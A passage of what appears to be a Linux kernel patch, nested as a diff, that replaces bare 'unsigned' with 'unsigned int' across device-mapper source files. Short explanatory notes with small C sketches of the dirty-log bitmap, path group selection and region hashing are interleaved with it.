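
	unsigned int dm_subjob_size(void)
	{
		return get_clamped_param(&subjob_size_kb, 512, 1024);
	}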
+diff --git a/drivers/md/dm-linear.c b/drivers/md/dm-linear.c
+index 3212ef6aa81bb..26b1af6461771 100644
+--- a/drivers/md/dm-linear.c
++++ b/drivers/md/dm-linear.c
+@@ -95,7 +95,7 @@ static int linear_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void linear_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct linear_c *lc = (struct linear_c *) ti->private;
+ 	size_t sz = 0;
+diff --git a/drivers/md/dm-log-userspace-base.c b/drivers/md/dm-log-userspace-base.c
+index 9ab93ebea8895..9fc69382692bd 100644
+--- a/drivers/md/dm-log-userspace-base.c
++++ b/drivers/md/dm-log-userspace-base.c
+@@ -123,7 +123,7 @@ retry:
+ }
+ 
+ static int build_constructor_string(struct dm_target *ti,
+-				    unsigned argc, char **argv,
++				    unsigned int argc, char **argv,
+ 				    char **ctr_str)
+ {
+ 	int i, str_size;
+@@ -188,7 +188,7 @@ static void do_flush(struct work_struct *work)
+  * to the userspace ctr function.
+  */
+ static int userspace_ctr(struct dm_dirty_log *log, struct dm_target *ti,
+-			 unsigned argc, char **argv)
++			 unsigned int argc, char **argv)
+ {
+ 	int r = 0;
+ 	int str_size;
+@@ -792,7 +792,7 @@ static region_t userspace_get_sync_count(struct dm_dirty_log *log)
+  * Returns: amount of space consumed
+  */
+ static int userspace_status(struct dm_dirty_log *log, status_type_t status_type,
+-			    char *result, unsigned maxlen)
++			    char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+ 	char *table_args;
+diff --git a/drivers/md/dm-log-userspace-transfer.c b/drivers/md/dm-log-userspace-transfer.c
+index fdf8ec304f8d2..072559b709edd 100644
+--- a/drivers/md/dm-log-userspace-transfer.c
++++ b/drivers/md/dm-log-userspace-transfer.c
+@@ -142,7 +142,7 @@ static void cn_ulog_callback(struct cn_msg *msg, struct netlink_skb_parms *nsp)
+ 		fill_pkg(msg, NULL);
+ 	else if (msg->len < sizeof(*tfr))
+ 		DMERR("Incomplete message received (expected %u, got %u): [%u]",
+-		      (unsigned)sizeof(*tfr), msg->len, msg->seq);
++		      (unsigned int)sizeof(*tfr), msg->len, msg->seq);
+ 	else
+ 		fill_pkg(NULL, tfr);
+ 	spin_unlock(&receiving_list_lock);
+diff --git a/drivers/md/dm-log-writes.c b/drivers/md/dm-log-writes.c
+index 178e13a5b059f..efdfb2e1868a4 100644
+--- a/drivers/md/dm-log-writes.c
++++ b/drivers/md/dm-log-writes.c
+@@ -792,10 +792,10 @@ static int normal_end_io(struct dm_target *ti, struct bio *bio,
+  * INFO format: <logged entries> <highest allocated sector>
+  */
+ static void log_writes_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result,
+-			      unsigned maxlen)
++			      unsigned int status_flags, char *result,
++			      unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct log_writes_c *lc = ti->private;
+ 
+ 	switch (type) {
+@@ -844,8 +844,8 @@ static int log_writes_iterate_devices(struct dm_target *ti,
+  * Messages supported:
+  *   mark <mark data> - specify the marked data.
+  */
+-static int log_writes_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int log_writes_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct log_writes_c *lc = ti->private;
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index cf10fa6677972..159f2c05dfd3c 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -223,7 +223,7 @@ struct log_c {
+ 	unsigned int region_count;
+ 	region_t sync_count;
+ 
+-	unsigned bitset_uint32_count;
++	unsigned int bitset_uint32_count;
+ 	uint32_t *clean_bits;
+ 	uint32_t *sync_bits;
+ 	uint32_t *recovering_bits;	/* FIXME: this seems excessive */
+@@ -255,20 +255,20 @@ struct log_c {
+  * The touched member needs to be updated every time we access
+  * one of the bitsets.
+  */
+-static inline int log_test_bit(uint32_t *bs, unsigned bit)
++static inline int log_test_bit(uint32_t *bs, unsigned int bit)
+ {
+ 	return test_bit_le(bit, bs) ? 1 : 0;
+ }
+ 
+ static inline void log_set_bit(struct log_c *l,
+-			       uint32_t *bs, unsigned bit)
++			       uint32_t *bs, unsigned int bit)
+ {
+ 	__set_bit_le(bit, bs);
+ 	l->touched_cleaned = 1;
+ }
+ 
+ static inline void log_clear_bit(struct log_c *l,
+-				 uint32_t *bs, unsigned bit)
++				 uint32_t *bs, unsigned int bit)
+ {
+ 	__clear_bit_le(bit, bs);
+ 	l->touched_dirtied = 1;
+@@ -582,7 +582,7 @@ static void fail_log_device(struct log_c *lc)
+ static int disk_resume(struct dm_dirty_log *log)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct log_c *lc = (struct log_c *) log->context;
+ 	size_t size = lc->bitset_uint32_count * sizeof(uint32_t);
+ 
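The log_set_bit()/log_clear_bit() helpers above pair every bitmap update with a "touched" flag, so the flush path can skip the disk write entirely when nothing changed. A minimal sketch of that idea with invented names (struct region_log is not a dm-log type):

	#include <stdbool.h>
	#include <stdint.h>

	struct region_log {
		uint32_t bits[8];	/* one bit per region: 256 regions here */
		bool touched;
	};

	static void log_mark_dirty(struct region_log *log, unsigned int region)
	{
		log->bits[region / 32] |= 1u << (region % 32);
		log->touched = true;
	}

	static bool log_flush(struct region_log *log)
	{
		if (!log->touched)
			return false;	/* nothing to write out */
		/* ... write log->bits to stable storage here ... */
		log->touched = false;
		return true;
	}

dm-log keeps two such flags (touched_cleaned, touched_dirtied) because clean and dirty transitions have different durability requirements, but the skip-if-untouched structure is the same.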
+diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c
+index 0e325469a252a..91c25ad8eed84 100644
+--- a/drivers/md/dm-mpath.c
++++ b/drivers/md/dm-mpath.c
+@@ -29,7 +29,7 @@
+ 
+ #define DM_MSG_PREFIX "multipath"
+ #define DM_PG_INIT_DELAY_MSECS 2000
+-#define DM_PG_INIT_DELAY_DEFAULT ((unsigned) -1)
++#define DM_PG_INIT_DELAY_DEFAULT ((unsigned int) -1)
+ #define QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT 0
+ 
+ static unsigned long queue_if_no_path_timeout_secs = QUEUE_IF_NO_PATH_TIMEOUT_DEFAULT;
+@@ -39,7 +39,7 @@ struct pgpath {
+ 	struct list_head list;
+ 
+ 	struct priority_group *pg;	/* Owning PG */
+-	unsigned fail_count;		/* Cumulative failure count */
++	unsigned int fail_count;		/* Cumulative failure count */
+ 
+ 	struct dm_path path;
+ 	struct delayed_work activate_path;
+@@ -59,8 +59,8 @@ struct priority_group {
+ 	struct multipath *m;		/* Owning multipath instance */
+ 	struct path_selector ps;
+ 
+-	unsigned pg_num;		/* Reference number */
+-	unsigned nr_pgpaths;		/* Number of paths in PG */
++	unsigned int pg_num;		/* Reference number */
++	unsigned int nr_pgpaths;		/* Number of paths in PG */
+ 	struct list_head pgpaths;
+ 
+ 	bool bypassed:1;		/* Temporarily bypass this PG? */
+@@ -78,14 +78,14 @@ struct multipath {
+ 	struct priority_group *next_pg;	/* Switch to this PG if set */
+ 
+ 	atomic_t nr_valid_paths;	/* Total number of usable paths */
+-	unsigned nr_priority_groups;
++	unsigned int nr_priority_groups;
+ 	struct list_head priority_groups;
+ 
+ 	const char *hw_handler_name;
+ 	char *hw_handler_params;
+ 	wait_queue_head_t pg_init_wait;	/* Wait for pg_init completion */
+-	unsigned pg_init_retries;	/* Number of times to retry pg_init */
+-	unsigned pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
++	unsigned int pg_init_retries;	/* Number of times to retry pg_init */
++	unsigned int pg_init_delay_msecs;	/* Number of msecs before pg_init retry */
+ 	atomic_t pg_init_in_progress;	/* Only one pg_init allowed at once */
+ 	atomic_t pg_init_count;		/* Number of times pg_init called */
+ 
+@@ -397,7 +397,7 @@ static struct pgpath *choose_pgpath(struct multipath *m, size_t nr_bytes)
+ 	unsigned long flags;
+ 	struct priority_group *pg;
+ 	struct pgpath *pgpath;
+-	unsigned bypassed = 1;
++	unsigned int bypassed = 1;
+ 
+ 	if (!atomic_read(&m->nr_valid_paths)) {
+ 		spin_lock_irqsave(&m->lock, flags);
+@@ -840,7 +840,7 @@ static int parse_path_selector(struct dm_arg_set *as, struct priority_group *pg,
+ {
+ 	int r;
+ 	struct path_selector_type *pst;
+-	unsigned ps_argc;
++	unsigned int ps_argc;
+ 
+ 	static const struct dm_arg _args[] = {
+ 		{0, 1024, "invalid number of path selector args"},
+@@ -983,7 +983,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 	};
+ 
+ 	int r;
+-	unsigned i, nr_selector_args, nr_args;
++	unsigned int i, nr_selector_args, nr_args;
+ 	struct priority_group *pg;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1049,7 +1049,7 @@ static struct priority_group *parse_priority_group(struct dm_arg_set *as,
+ 
+ static int parse_hw_handler(struct dm_arg_set *as, struct multipath *m)
+ {
+-	unsigned hw_argc;
++	unsigned int hw_argc;
+ 	int ret;
+ 	struct dm_target *ti = m->ti;
+ 
+@@ -1101,7 +1101,7 @@ fail:
+ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = m->ti;
+ 	const char *arg_name;
+ 
+@@ -1170,7 +1170,7 @@ static int parse_features(struct dm_arg_set *as, struct multipath *m)
+ 	return r;
+ }
+ 
+-static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int multipath_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	/* target arguments */
+ 	static const struct dm_arg _args[] = {
+@@ -1181,8 +1181,8 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	int r;
+ 	struct multipath *m;
+ 	struct dm_arg_set as;
+-	unsigned pg_count = 0;
+-	unsigned next_pg_num;
++	unsigned int pg_count = 0;
++	unsigned int next_pg_num;
+ 	unsigned long flags;
+ 
+ 	as.argc = argc;
+@@ -1224,7 +1224,7 @@ static int multipath_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	/* parse the priority groups */
+ 	while (as.argc) {
+ 		struct priority_group *pg;
+-		unsigned nr_valid_paths = atomic_read(&m->nr_valid_paths);
++		unsigned int nr_valid_paths = atomic_read(&m->nr_valid_paths);
+ 
+ 		pg = parse_priority_group(&as, m);
+ 		if (IS_ERR(pg)) {
+@@ -1365,7 +1365,7 @@ static int reinstate_path(struct pgpath *pgpath)
+ 	int r = 0, run_queue = 0;
+ 	unsigned long flags;
+ 	struct multipath *m = pgpath->pg->m;
+-	unsigned nr_valid_paths;
++	unsigned int nr_valid_paths;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+ 
+@@ -1454,7 +1454,7 @@ static void bypass_pg(struct multipath *m, struct priority_group *pg,
+ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	unsigned long flags;
+ 	char dummy;
+ 
+@@ -1487,7 +1487,7 @@ static int switch_pg_num(struct multipath *m, const char *pgstr)
+ static int bypass_pg_num(struct multipath *m, const char *pgstr, bool bypassed)
+ {
+ 	struct priority_group *pg;
+-	unsigned pgnum;
++	unsigned int pgnum;
+ 	char dummy;
+ 
+ 	if (!pgstr || (sscanf(pgstr, "%u%c", &pgnum, &dummy) != 1) || !pgnum ||
+@@ -1789,14 +1789,14 @@ static void multipath_resume(struct dm_target *ti)
+  *      num_paths num_selector_args [path_dev [selector_args]* ]+ ]+
+  */
+ static void multipath_status(struct dm_target *ti, status_type_t type,
+-			     unsigned status_flags, char *result, unsigned maxlen)
++			     unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int sz = 0, pg_counter, pgpath_counter;
+ 	unsigned long flags;
+ 	struct multipath *m = ti->private;
+ 	struct priority_group *pg;
+ 	struct pgpath *p;
+-	unsigned pg_num;
++	unsigned int pg_num;
+ 	char state;
+ 
+ 	spin_lock_irqsave(&m->lock, flags);
+@@ -1948,8 +1948,8 @@ static void multipath_status(struct dm_target *ti, status_type_t type,
+ 	spin_unlock_irqrestore(&m->lock, flags);
+ }
+ 
+-static int multipath_message(struct dm_target *ti, unsigned argc, char **argv,
+-			     char *result, unsigned maxlen)
++static int multipath_message(struct dm_target *ti, unsigned int argc, char **argv,
++			     char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_dev *dev;
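choose_pgpath() above (the "unsigned int bypassed = 1" hunk) scans the priority groups twice: bypassed groups are skipped on the first pass and only tried once every non-bypassed group has failed. A stripped-down sketch of that two-pass selection, assuming toy types; the real code also honours m->next_pg and runs under m->lock:

	#include <stdbool.h>
	#include <stddef.h>

	struct group { bool bypassed; bool usable; };

	static struct group *choose_group(struct group *pgs, size_t n)
	{
		unsigned int pass;
		size_t i;

		for (pass = 0; pass < 2; pass++)
			for (i = 0; i < n; i++) {
				if (pgs[i].bypassed != (bool)pass)
					continue;	/* wrong pass for this group */
				if (pgs[i].usable)
					return &pgs[i];
			}
		return NULL;	/* all paths down */
	}

Pass 0 considers only normal groups, pass 1 falls back to the bypassed ones, which is exactly what lets an administrator soft-disable a group without losing it as a last resort.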
+diff --git a/drivers/md/dm-mpath.h b/drivers/md/dm-mpath.h
+index e230f71962596..5343698fe5f1b 100644
+--- a/drivers/md/dm-mpath.h
++++ b/drivers/md/dm-mpath.h
+@@ -17,6 +17,6 @@ struct dm_path {
+ };
+ 
+ /* Callback for hwh_pg_init_fn to use when complete */
+-void dm_pg_init_complete(struct dm_path *path, unsigned err_flags);
++void dm_pg_init_complete(struct dm_path *path, unsigned int err_flags);
+ 
+ #endif
+diff --git a/drivers/md/dm-path-selector.h b/drivers/md/dm-path-selector.h
+index 83cac2b04b668..0f2b37af87662 100644
+--- a/drivers/md/dm-path-selector.h
++++ b/drivers/md/dm-path-selector.h
+@@ -52,7 +52,7 @@ struct path_selector_type {
+ 	/*
+ 	 * Constructs a path selector object, takes custom arguments
+ 	 */
+-	int (*create) (struct path_selector *ps, unsigned argc, char **argv);
++	int (*create) (struct path_selector *ps, unsigned int argc, char **argv);
+ 	void (*destroy) (struct path_selector *ps);
+ 
+ 	/*
+diff --git a/drivers/md/dm-ps-io-affinity.c b/drivers/md/dm-ps-io-affinity.c
+index f74501e65a8ed..76ce4ce872229 100644
+--- a/drivers/md/dm-ps-io-affinity.c
++++ b/drivers/md/dm-ps-io-affinity.c
+@@ -108,7 +108,7 @@ free_pi:
+ 	return ret;
+ }
+ 
+-static int ioa_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ioa_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -138,7 +138,7 @@ free_selector:
+ static void ioa_destroy(struct path_selector *ps)
+ {
+ 	struct selector *s = ps->context;
+-	unsigned cpu;
++	unsigned int cpu;
+ 
+ 	for_each_cpu(cpu, s->path_mask)
+ 		ioa_free_path(s, cpu);
+diff --git a/drivers/md/dm-ps-queue-length.c b/drivers/md/dm-ps-queue-length.c
+index cef70657bbbc2..6fbec9fc242d9 100644
+--- a/drivers/md/dm-ps-queue-length.c
++++ b/drivers/md/dm-ps-queue-length.c
+@@ -35,7 +35,7 @@ struct selector {
+ struct path_info {
+ 	struct list_head	list;
+ 	struct dm_path		*path;
+-	unsigned		repeat_count;
++	unsigned int		repeat_count;
+ 	atomic_t		qlen;	/* the number of in-flight I/Os */
+ };
+ 
+@@ -52,7 +52,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int ql_create(struct path_selector *ps, unsigned argc, char **argv)
++static int ql_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -84,9 +84,9 @@ static void ql_destroy(struct path_selector *ps)
+ }
+ 
+ static int ql_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	/* When called with NULL path, return selector status/args. */
+@@ -116,7 +116,7 @@ static int ql_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = QL_MIN_IO;
++	unsigned int repeat_count = QL_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-round-robin.c b/drivers/md/dm-ps-round-robin.c
+index 27f44c5fa04e8..1d07392b5ed48 100644
+--- a/drivers/md/dm-ps-round-robin.c
++++ b/drivers/md/dm-ps-round-robin.c
+@@ -26,7 +26,7 @@
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
++	unsigned int repeat_count;
+ };
+ 
+ static void free_paths(struct list_head *paths)
+@@ -62,7 +62,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int rr_create(struct path_selector *ps, unsigned argc, char **argv)
++static int rr_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s;
+ 
+@@ -119,7 +119,7 @@ static int rr_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = RR_MIN_IO;
++	unsigned int repeat_count = RR_MIN_IO;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-ps-service-time.c b/drivers/md/dm-ps-service-time.c
+index 3ec9c33265c52..84d26234dc053 100644
+--- a/drivers/md/dm-ps-service-time.c
++++ b/drivers/md/dm-ps-service-time.c
+@@ -30,8 +30,8 @@ struct selector {
+ struct path_info {
+ 	struct list_head list;
+ 	struct dm_path *path;
+-	unsigned repeat_count;
+-	unsigned relative_throughput;
++	unsigned int repeat_count;
++	unsigned int relative_throughput;
+ 	atomic_t in_flight_size;	/* Total size of in-flight I/Os */
+ };
+ 
+@@ -48,7 +48,7 @@ static struct selector *alloc_selector(void)
+ 	return s;
+ }
+ 
+-static int st_create(struct path_selector *ps, unsigned argc, char **argv)
++static int st_create(struct path_selector *ps, unsigned int argc, char **argv)
+ {
+ 	struct selector *s = alloc_selector();
+ 
+@@ -80,9 +80,9 @@ static void st_destroy(struct path_selector *ps)
+ }
+ 
+ static int st_status(struct path_selector *ps, struct dm_path *path,
+-		     status_type_t type, char *result, unsigned maxlen)
++		     status_type_t type, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct path_info *pi;
+ 
+ 	if (!path)
+@@ -113,8 +113,8 @@ static int st_add_path(struct path_selector *ps, struct dm_path *path,
+ {
+ 	struct selector *s = ps->context;
+ 	struct path_info *pi;
+-	unsigned repeat_count = ST_MIN_IO;
+-	unsigned relative_throughput = 1;
++	unsigned int repeat_count = ST_MIN_IO;
++	unsigned int relative_throughput = 1;
+ 	char dummy;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index 54263679a7b14..b26c12856b1db 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -3712,7 +3712,7 @@ static void raid_status(struct dm_target *ti, status_type_t type,
+ }
+ 
+ static int raid_message(struct dm_target *ti, unsigned int argc, char **argv,
+-			char *result, unsigned maxlen)
++			char *result, unsigned int maxlen)
+ {
+ 	struct raid_set *rs = ti->private;
+ 	struct mddev *mddev = &rs->md;
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index 06a38dc320253..8bd7e87d3538e 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -82,7 +82,7 @@ struct mirror_set {
+ 
+ 	struct work_struct trigger_event;
+ 
+-	unsigned nr_mirrors;
++	unsigned int nr_mirrors;
+ 	struct mirror mirror[];
+ };
+ 
+@@ -327,7 +327,7 @@ static void recovery_complete(int read_err, unsigned long write_err,
+ 
+ static void recover(struct mirror_set *ms, struct dm_region *reg)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_io_region from, to[DM_KCOPYD_MAX_REGIONS], *dest;
+ 	struct mirror *m;
+ 	unsigned long flags = 0;
+@@ -593,7 +593,7 @@ static void do_reads(struct mirror_set *ms, struct bio_list *reads)
+ 
+ static void write_callback(unsigned long error, void *context)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct bio *bio = (struct bio *) context;
+ 	struct mirror_set *ms;
+ 	int should_wake = 0;
+@@ -963,10 +963,10 @@ static int get_mirror(struct mirror_set *ms, struct dm_target *ti,
+  * Create dirty log: log_type #log_params <log_params>
+  */
+ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+-					     unsigned argc, char **argv,
+-					     unsigned *args_used)
++					     unsigned int argc, char **argv,
++					     unsigned int *args_used)
+ {
+-	unsigned param_count;
++	unsigned int param_count;
+ 	struct dm_dirty_log *dl;
+ 	char dummy;
+ 
+@@ -997,10 +997,10 @@ static struct dm_dirty_log *create_dirty_log(struct dm_target *ti,
+ 	return dl;
+ }
+ 
+-static int parse_features(struct mirror_set *ms, unsigned argc, char **argv,
+-			  unsigned *args_used)
++static int parse_features(struct mirror_set *ms, unsigned int argc, char **argv,
++			  unsigned int *args_used)
+ {
+-	unsigned num_features;
++	unsigned int num_features;
+ 	struct dm_target *ti = ms->ti;
+ 	char dummy;
+ 	int i;
+@@ -1389,7 +1389,7 @@ static char device_status_char(struct mirror *m)
+ 
+ 
+ static void mirror_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	unsigned int m, sz = 0;
+ 	int num_feature_args = 0;
+@@ -1458,7 +1458,7 @@ static int mirror_iterate_devices(struct dm_target *ti,
+ {
+ 	struct mirror_set *ms = ti->private;
+ 	int ret = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; !ret && i < ms->nr_mirrors; i++)
+ 		ret = fn(ti, ms->mirror[i].dev,
+diff --git a/drivers/md/dm-region-hash.c b/drivers/md/dm-region-hash.c
+index 1f760451e6f48..adbdb4b671372 100644
+--- a/drivers/md/dm-region-hash.c
++++ b/drivers/md/dm-region-hash.c
+@@ -56,17 +56,17 @@
+  *---------------------------------------------------------------*/
+ struct dm_region_hash {
+ 	uint32_t region_size;
+-	unsigned region_shift;
++	unsigned int region_shift;
+ 
+ 	/* holds persistent region state */
+ 	struct dm_dirty_log *log;
+ 
+ 	/* hash table */
+ 	rwlock_t hash_lock;
+-	unsigned mask;
+-	unsigned nr_buckets;
+-	unsigned prime;
+-	unsigned shift;
++	unsigned int mask;
++	unsigned int nr_buckets;
++	unsigned int prime;
++	unsigned int shift;
+ 	struct list_head *buckets;
+ 
+ 	/*
+@@ -74,7 +74,7 @@ struct dm_region_hash {
+ 	 */
+ 	int flush_failure;
+ 
+-	unsigned max_recovery; /* Max # of regions to recover in parallel */
++	unsigned int max_recovery; /* Max # of regions to recover in parallel */
+ 
+ 	spinlock_t region_lock;
+ 	atomic_t recovery_in_flight;
+@@ -163,12 +163,12 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions)
+ {
+ 	struct dm_region_hash *rh;
+-	unsigned nr_buckets, max_buckets;
++	unsigned int nr_buckets, max_buckets;
+ 	size_t i;
+ 	int ret;
+ 
+@@ -236,7 +236,7 @@ EXPORT_SYMBOL_GPL(dm_region_hash_create);
+ 
+ void dm_region_hash_destroy(struct dm_region_hash *rh)
+ {
+-	unsigned h;
++	unsigned int h;
+ 	struct dm_region *reg, *nreg;
+ 
+ 	BUG_ON(!list_empty(&rh->quiesced_regions));
+@@ -263,9 +263,9 @@ struct dm_dirty_log *dm_rh_dirty_log(struct dm_region_hash *rh)
+ }
+ EXPORT_SYMBOL_GPL(dm_rh_dirty_log);
+ 
+-static unsigned rh_hash(struct dm_region_hash *rh, region_t region)
++static unsigned int rh_hash(struct dm_region_hash *rh, region_t region)
+ {
+-	return (unsigned) ((region * rh->prime) >> rh->shift) & rh->mask;
++	return (unsigned int) ((region * rh->prime) >> rh->shift) & rh->mask;
+ }
+ 
+ static struct dm_region *__rh_lookup(struct dm_region_hash *rh, region_t region)
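rh_hash() above is a classic multiplicative hash into a power-of-two table: multiplying by a large prime mixes the low bits of the region number upwards, the shift selects well-mixed bits, and the mask cuts the result down to the bucket count. A standalone sketch with illustrative constants (dm_region_hash_create() derives prime, shift and mask from the requested table size):

	#include <stdint.h>

	#define NR_BUCKETS	1024u			/* power of two */
	#define MASK		(NR_BUCKETS - 1)
	#define PRIME		4294967291ull		/* any large odd prime works */
	#define SHIFT		12			/* drop weakly mixed low bits */

	static unsigned int region_hash(uint64_t region)
	{
		return (unsigned int)((region * PRIME) >> SHIFT) & MASK;
	}

Sequential region numbers, the common access pattern during recovery, spread across buckets instead of clustering, which keeps the per-bucket lists short.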
+diff --git a/drivers/md/dm-rq.c b/drivers/md/dm-rq.c
+index a41209a43506c..80f46e01bca44 100644
+--- a/drivers/md/dm-rq.c
++++ b/drivers/md/dm-rq.c
+@@ -23,33 +23,33 @@ struct dm_rq_target_io {
+ 	union map_info info;
+ 	struct dm_stats_aux stats_aux;
+ 	unsigned long duration_jiffies;
+-	unsigned n_sectors;
+-	unsigned completed;
++	unsigned int n_sectors;
++	unsigned int completed;
+ };
+ 
+ #define DM_MQ_NR_HW_QUEUES 1
+ #define DM_MQ_QUEUE_DEPTH 2048
+-static unsigned dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
+-static unsigned dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
++static unsigned int dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
++static unsigned int dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
+ 
+ /*
+  * Request-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_REQUEST_BASED_IOS	256
+-static unsigned reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
++static unsigned int reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
+ 
+-unsigned dm_get_reserved_rq_based_ios(void)
++unsigned int dm_get_reserved_rq_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_rq_based_ios,
+ 				     RESERVED_REQUEST_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ 
+-static unsigned dm_get_blk_mq_nr_hw_queues(void)
++static unsigned int dm_get_blk_mq_nr_hw_queues(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_nr_hw_queues, 1, 32);
+ }
+ 
+-static unsigned dm_get_blk_mq_queue_depth(void)
++static unsigned int dm_get_blk_mq_queue_depth(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_queue_depth,
+ 				     DM_MQ_QUEUE_DEPTH, BLK_MQ_MAX_DEPTH);
+diff --git a/drivers/md/dm-rq.h b/drivers/md/dm-rq.h
+index 1eea0da641db5..2c97ad1451400 100644
+--- a/drivers/md/dm-rq.h
++++ b/drivers/md/dm-rq.h
+@@ -38,7 +38,7 @@ void dm_stop_queue(struct request_queue *q);
+ 
+ void dm_mq_kick_requeue_list(struct mapped_device *md);
+ 
+-unsigned dm_get_reserved_rq_based_ios(void);
++unsigned int dm_get_reserved_rq_based_ios(void);
+ 
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_show(struct mapped_device *md, char *buf);
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_store(struct mapped_device *md,
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 680cc05ec6542..5176810f5d243 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -303,7 +303,7 @@ static int read_header(struct pstore *ps, int *new_snapshot)
+ {
+ 	int r;
+ 	struct disk_header *dh;
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 	int chunk_size_supplied = 1;
+ 	char *chunk_err;
+ 
+@@ -895,11 +895,11 @@ err_workqueue:
+ 	return r;
+ }
+ 
+-static unsigned persistent_status(struct dm_exception_store *store,
++static unsigned int persistent_status(struct dm_exception_store *store,
+ 				  status_type_t status, char *result,
+-				  unsigned maxlen)
++				  unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap-transient.c b/drivers/md/dm-snap-transient.c
+index 0e0ae4c36b374..d83a0565bd101 100644
+--- a/drivers/md/dm-snap-transient.c
++++ b/drivers/md/dm-snap-transient.c
+@@ -84,11 +84,11 @@ static int transient_ctr(struct dm_exception_store *store, char *options)
+ 	return 0;
+ }
+ 
+-static unsigned transient_status(struct dm_exception_store *store,
++static unsigned int transient_status(struct dm_exception_store *store,
+ 				 status_type_t status, char *result,
+-				 unsigned maxlen)
++				 unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
